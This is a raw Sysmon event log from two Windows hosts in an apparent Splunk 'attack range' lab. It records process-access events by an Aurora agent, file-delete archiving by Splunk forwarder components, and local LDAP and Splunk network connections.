Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.235{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.234{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.211{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=847827BE765C23DDE063AB4FEE8B6114,SHA256=1059B16E5F7ADD8F9C1DC563C6AF12DA08E18275025A8A639A46BAEFA8BAEEE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.201{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.201{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.201{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.190{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017834Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:55.667{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C5FEA0EDD6D664B034EE9B5B582DA37,SHA256=7F533AB2D9B13A4B282A8BBF53D847F54CED0BDAA69D0B952B1CA284E6B6B01E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:55.828{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=F564892FEC82B9965222963BBEC2EAC7,SHA256=14396904E28F148311A68674FD90C880D5A5E4DA7EEF3D75007F691171DF496F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:55.674{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5682676EB52EC65DE8BD29B3DE3E160D,SHA256=27BCC557FD042C70EA243DD17F8103CB168D171A5122808C111FF1C66324A072,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017835Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:56.764{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8235950F5054D05EFD09C0D511845FAB,SHA256=3503D14F6ECAE32EA43879944A774D4C421F1A9858AF8785A5DAA7ABE734E3C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:56.815{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F81A6A9D6997B3A966BE4571C5F3581,SHA256=3A6D1AAEE08EE3D2A418BDEF3AAC76A6FFA393BAE2EBA94FD7B920175F65B37A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:56.048{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=975BF16FC58AD9695C810B8E56CEBDC7,SHA256=7075AFB1A4156C9D09BC610EFF5007D9E72DEBD9F2CEFC87E8226632DC571B81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:57.895{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B21C6A869A0F7790C2702E9AB3631BB6,SHA256=BDF402A94DB327AF2CFA8DFE5B2F5395C38363FCC68251498DF1E157E3E4D46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017836Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:57.835{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A88D785609023813E4CC4EEB95D278,SHA256=A89D00D9379E587287DB95A475A817FAAC171CFD868E1DBD8EACFF6D251C92B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.368{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56424-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000045468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.368{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56424-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000045472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:58.992{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8F240F8D6515CDD541AEA612841D22E,SHA256=8BE2601CD8E6EFE35F6BE1A5E8EA0A33B6AEF951D1FF28BC0EC6C46A9FC01C23,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017838Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:58.913{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D7EEF8B7C4B2A81C007276D1ADF9C27,SHA256=4ABA06FC926A87C3E0FA04DE7B83D7AE83E9F298E831F2CA325BA745553ECA1B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:54.531{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56425-false10.0.1.12-8000- 354300x800000000000000017837Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:56.083{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50153-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000045473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:59.873{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=FB5069B3AFFBE1292431C41D9CABF973,SHA256=B9C6316AEBF8F50398B7AB5CFCD3BE10F4DC8CDCE89039D25DF37A279DEFE605,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:00.074{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065162961F11269404967325D0744F86,SHA256=B26CDD362960617F511613D1ED3C6FD2DAE88A79F24ED61C4DEA7829589752E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017840Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:00.682{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=CDA5FB6332122BEF53BEF5FE043F628C,SHA256=3B317615594D2D97D4B0C1731485801FCB522B1A535BBB97F2FD35CE4F443D04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017839Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:00.003{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0325BA1A0651361BB73205B75F547945,SHA256=DC1D84D9FFAF37F44B10E03C34F5ADBE82B2303D116475159D39263BA8A71D70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:01.186{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39EB077B9A8863A6246AF36F1592AB7,SHA256=44FF97A1D6310E23053B0D3ECCC26378416F6337878989020DD76BCFAFFFAFC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017841Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:01.084{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F72DD93A325779543D330BA31EAC8495,SHA256=4E0788C5F2D5CD3B362F8ABB72DD95817F24537CB7148A6BA29490D26BABFA39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:02.264{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D0D03EB6B887463B29513470C96743A,SHA256=3A42F029FD36DCBC8227616B8ECF1B7B2C11F8FDE683DA7A9B3B34B1A87B8EFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017873Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.756{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017872Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.753{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017871Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.752{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017870Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017869Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.745{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017868Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.744{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017867Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.743{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017866Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.737{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program 